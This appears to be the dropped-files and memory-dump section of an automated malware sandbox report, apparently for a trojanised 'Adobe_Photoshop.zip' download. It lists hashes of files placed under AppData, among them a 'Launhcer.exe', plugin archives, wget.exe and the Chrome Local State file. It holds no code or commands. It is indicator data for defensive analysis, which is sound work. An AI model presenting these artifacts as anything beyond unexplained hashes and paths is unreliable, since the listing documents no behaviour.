1651a16524c9ba6c4bd4765fe9e8d9f4c65c4ea8ba3ee877700fa9a467ee5fab77102d3037c3a4e2dc44c2803bc95357f635f9b327789463db93502b3bebe49c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
5788b8bba6740c7feceb952ec710a67f

SHA1
7bfb4a1cbaa87176830b4fc16890710fc768d8d7

SHA256
dfdbd6c1006a69e609c8626458fddc5e42fd7be6093a8592883d898fc6a83d13

SHA512
f25797e36f31ade022bdd5d7adc88dda03fe6db8cb44cbcae7d29c39e935562d01dbbf91b5b14c170b5ea9f7e44092839bf92d16dc5200df21be54c039362178

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
935d5227cd66d21ec5f73fa74c0379dc

SHA1
7a2ead20c1b812eb3080eb6e9c9dcde9bfde4019

SHA256
c337ce9d6a0c230033dd7fc2ec43e785f395b3aa5e740573f28d46794a742580

SHA512
0cfe503a15fe6a09d70373632c186ef8377b7d07aa46e7a69ee6eb97f4d9992fa4100a6540507985a21ef69c9b58f3413097a3339790d3c502dedc92efc3a815

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
733aa3daad38b8c3b626165133fe997d

SHA1
14b5cd53d78a99935fcf6978f0b47cae310efb08

SHA256
d7dd6e3e001256706bc83f058298a5f70792a2b175d06dc451174d9a4c47e17c

SHA512
a044f37bf9cbd7e49825e7726bca058de25d81db4bd91a3af765c24d640277a7f2ee6973680b829c6c8374e00db1f4a4b8f3591d0fe11903da772bd41429b1d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sx4jojbw.y22.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
deaf8329817ad1f2d5e0f5781f81ca83

SHA1
fa74c09b894baf3d3e9e9e3773f2547362ea3711

SHA256
64be8ef4a118101b07080ec4ed45d991da2f1164620d9dd4f12a4cc98d31dc9e

SHA512
a10c10f775b89440364e662b60581b8db811ac472b370e7655eb7226b974ecb55a0298f18c8b5e09a3e78136de7486848ede6b6b652e34de9c87e11d15a26508

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins7727.rar

Filesize
2.9MB

MD5
a8ed41e070a43f585a5bdd420150b46d

SHA1
26525d416739c378f045a57086bcb243d5bb5829

SHA256
63a24f1ac4393f02d3d4e72963e8158eac4d6f9b93a18abe1d4ea25a98027182

SHA512
c89799edaa8b8cb0e4f572ae0d35fb08f85919b9cf1399d311c9f40207335e4cdd90fab47d7c81424876cbc147cec231ad9f2976f7f7a593f07e382129a00589

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins549.rar

Filesize
9.6MB

MD5
5cfa362d6d89d663bdb58ccd5333a54a

SHA1
a4753db03c5ddcc3f07eb4ce3b9f909fb9807fcd

SHA256
6f3299d60da1cee65c07ff09c0ed630eeccbf60d2b7c5a523a82b8b1f9d7242f

SHA512
55bf3494ffcdcbe1de0e798c2d5bfa8ade3fd1e68d77481eec9a0a2731569ade26d69b18cbe26a941c2459644ca21bd9e53a521ecad7b0065a45ce056c4a88db

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins2536.rar

Filesize
2.8MB

MD5
8349c8699b21140a3354eef28a73d7ae

SHA1
dedad5a5102f8d54530b212617a3144e31e4fe33

SHA256
49f5a9b2803a23d7a5fafd6d717b725f06f90d5e928976113ded3cbd1ef1388f

SHA512
746687363a395447763a87f90df079be13c84867f31aa685b4abde9d568eace12b8d8847a8987f8a15d6052bfea1bedb61d851cabf9cf50bcc215aa54ab60730

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin28438

Filesize
7.2MB

MD5
3d42a95de858de974d5dad1cbc7e87ed

SHA1
230e157d35007fbf594243e93fa2bf84982c5c46

SHA256
47a98e0d3ba207cf0afeef5d9d04c893dbe5bfb6e0c5537fa583bdb67c915010

SHA512
500072e9c94a92e23b9f24785c8218d35224422a4d2fbeb2ac273a3ef6957a93b73b8716297bdbbab8334ba5fb1700415c50d39b6be45ae9dd467dbebe9b4974

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin13200

Filesize
429KB

MD5
233ea23b1c1587f1cf895f08ba6da10b

SHA1
e2b5131d03aa3bc56a004ba6debc6d57322e0691

SHA256
c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c

SHA512
4f1d72732e8ea42665b325060b1dcbe8bd47b7fb78ba9e9be9d5da8c9be97206bce8b9fd319a95cd9514fa2ff58eb9194068bde09af4bef0e6d3435562e647a9

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
a37d6bd996505a42c3f29d0ed54b9ae7

SHA1
36759677d2e52e9b75b6a6b14f4f03b0dc1b0e79

SHA256
606f3b07ef6896fd75f51bd1ca1af4ed8075b22f9ca1cf8b1a0bf5bfc6d3074a

SHA512
8a8fa253062bac723dc7cffbff199fa78f7b6975019bfbdf11372711b58f0b8d1dbe1ff574280343abf290d99210c2feb8a691d1504a11d4bd934eaaa47fd149

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin31849

Filesize
459KB

MD5
5d5483b1ef3cfe2abaebcdaeace7da21

SHA1
6915c04741b3e4380577e497527ad15fc3108495

SHA256
ff7a3b83cf95c7c27b59c4db9de3f7b67c5d2909c4d72d46299654c108738ebd

SHA512
1ea901be644aac5649cf658510e2e4e88da26e4086d876ab3fc88bed25a4d8ab290077fe373757827c395398f0c9022c253ea7b87c71691d6fb5deab9ac24dfe

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
C:\Users\Admin\Downloads\Adobe_Photoshop.zip

Filesize
28.3MB

MD5
baccc6e96b50d5e82b90fb8475d106d9

SHA1
02f179be46153a2e3dff555fc8043a740492639f

SHA256
7fcf9cc9584ff846f20dcb75c373f5c426da032e73e95bcdc3cb47df2863b0ca

SHA512
f9707c9039b1426e312595bcfefb2d0ca01bebe7bf6d341e22b7c8bbfc1980417c2196651f194d618a23a1bf1bae90074ad60ca06f4bf4d5f785c3b504fa4571

Download Submit
memory/816-377-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-383-0x000001E520360000-0x000001E520380000-memory.dmp

Filesize
128KB

Download
memory/816-382-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-388-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-387-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-386-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-385-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-384-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-381-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-378-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-380-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-376-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-379-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-434-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/816-435-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/944-364-0x000001CBF3160000-0x000001CBF317A000-memory.dmp

Filesize
104KB

Download
memory/944-361-0x000001CBF2ED0000-0x000001CBF2EEC000-memory.dmp

Filesize
112KB

Download
memory/944-365-0x000001CBF3140000-0x000001CBF3146000-memory.dmp

Filesize
24KB

Download
memory/944-363-0x000001CBF2FB0000-0x000001CBF2FBA000-memory.dmp

Filesize
40KB

Download
memory/944-362-0x000001CBF2EF0000-0x000001CBF2FA5000-memory.dmp

Filesize
724KB

Download
memory/1400-247-0x00000000001D0000-0x00000000001D9000-memory.dmp

Filesize
36KB

Download
memory/1400-250-0x00007FFC0D1D0000-0x00007FFC0D3C5000-memory.dmp

Filesize
2.0MB

Download
memory/1400-249-0x0000000002050000-0x0000000002450000-memory.dmp

Filesize
4.0MB

Download
memory/1400-252-0x0000000075860000-0x0000000075A75000-memory.dmp

Filesize
2.1MB

Download
memory/1772-255-0x00007FFC0D3E0000-0x00007FFC0D3E2000-memory.dmp

Filesize
8KB

Download
memory/1772-254-0x00007FFC0D3D0000-0x00007FFC0D3D2000-memory.dmp

Filesize
8KB

Download
memory/1772-265-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/1832-351-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download
memory/2264-192-0x0000000007A70000-0x00000000080EA000-memory.dmp

Filesize
6.5MB

Download
memory/2264-194-0x0000000007630000-0x0000000007641000-memory.dmp

Filesize
68KB

Download
memory/2264-193-0x00000000074A0000-0x00000000074AA000-memory.dmp

Filesize
40KB

Download
memory/2264-200-0x00000000076A0000-0x00000000076A8000-memory.dmp

Filesize
32KB

Download
memory/2264-191-0x00000000072D0000-0x0000000007373000-memory.dmp

Filesize
652KB

Download
memory/2264-198-0x00000000076B0000-0x00000000076CA000-memory.dmp

Filesize
104KB

Download
memory/2264-196-0x0000000007670000-0x0000000007684000-memory.dmp

Filesize
80KB

Download
memory/2264-195-0x0000000007660000-0x000000000766E000-memory.dmp

Filesize
56KB

Download
memory/2264-179-0x00000000066B0000-0x00000000066E2000-memory.dmp

Filesize
200KB

Download
memory/2264-180-0x000000006F4F0000-0x000000006F53C000-memory.dmp

Filesize
304KB

Download
memory/2264-190-0x00000000066F0000-0x000000000670E000-memory.dmp

Filesize
120KB

Download
memory/3544-274-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3700-341-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/3776-317-0x0000022FF9340000-0x0000022FF9362000-memory.dmp

Filesize
136KB

Download
memory/3776-332-0x0000022FF9600000-0x0000022FF960A000-memory.dmp

Filesize
40KB

Download
memory/3776-331-0x0000022FF95F0000-0x0000022FF95F8000-memory.dmp

Filesize
32KB

Download
memory/3776-330-0x0000022FF95C0000-0x0000022FF95CA000-memory.dmp

Filesize
40KB

Download
memory/3776-329-0x0000022FF95D0000-0x0000022FF95EC000-memory.dmp

Filesize
112KB

Download
memory/4080-446-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download
memory/4208-162-0x0000000006F00000-0x0000000006F96000-memory.dmp

Filesize
600KB

Download
memory/4208-159-0x0000000005B50000-0x0000000005EA4000-memory.dmp

Filesize
3.3MB

Download
memory/4208-145-0x0000000002630000-0x0000000002666000-memory.dmp

Filesize
216KB

Download
memory/4208-146-0x00000000050E0000-0x0000000005708000-memory.dmp

Filesize
6.2MB

Download
memory/4208-147-0x0000000005090000-0x00000000050B2000-memory.dmp

Filesize
136KB

Download
memory/4208-149-0x00000000058F0000-0x0000000005956000-memory.dmp

Filesize
408KB

Download
memory/4208-148-0x0000000005880000-0x00000000058E6000-memory.dmp

Filesize
408KB

Download
memory/4208-160-0x0000000005F30000-0x0000000005F4E000-memory.dmp

Filesize
120KB

Download
memory/4208-165-0x00000000077B0000-0x0000000007D54000-memory.dmp

Filesize
5.6MB

Download
memory/4208-164-0x00000000064B0000-0x00000000064D2000-memory.dmp

Filesize
136KB

Download
memory/4208-163-0x0000000006460000-0x000000000647A000-memory.dmp

Filesize
104KB

Download
memory/4208-161-0x0000000005F80000-0x0000000005FCC000-memory.dmp

Filesize
304KB

Download
memory/4348-368-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4348-375-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4348-372-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4348-371-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4348-370-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4348-369-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4596-244-0x00007FFC0D1D0000-0x00007FFC0D3C5000-memory.dmp

Filesize
2.0MB

Download
memory/4596-253-0x0000000000400000-0x000000000285C000-memory.dmp

Filesize
36.4MB

Download
memory/4596-242-0x0000000005800000-0x0000000005C00000-memory.dmp

Filesize
4.0MB

Download
memory/4596-246-0x0000000075860000-0x0000000075A75000-memory.dmp

Filesize
2.1MB

Download
memory/4596-243-0x0000000005800000-0x0000000005C00000-memory.dmp

Filesize
4.0MB

Download
memory/4604-204-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/4848-232-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/5008-297-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download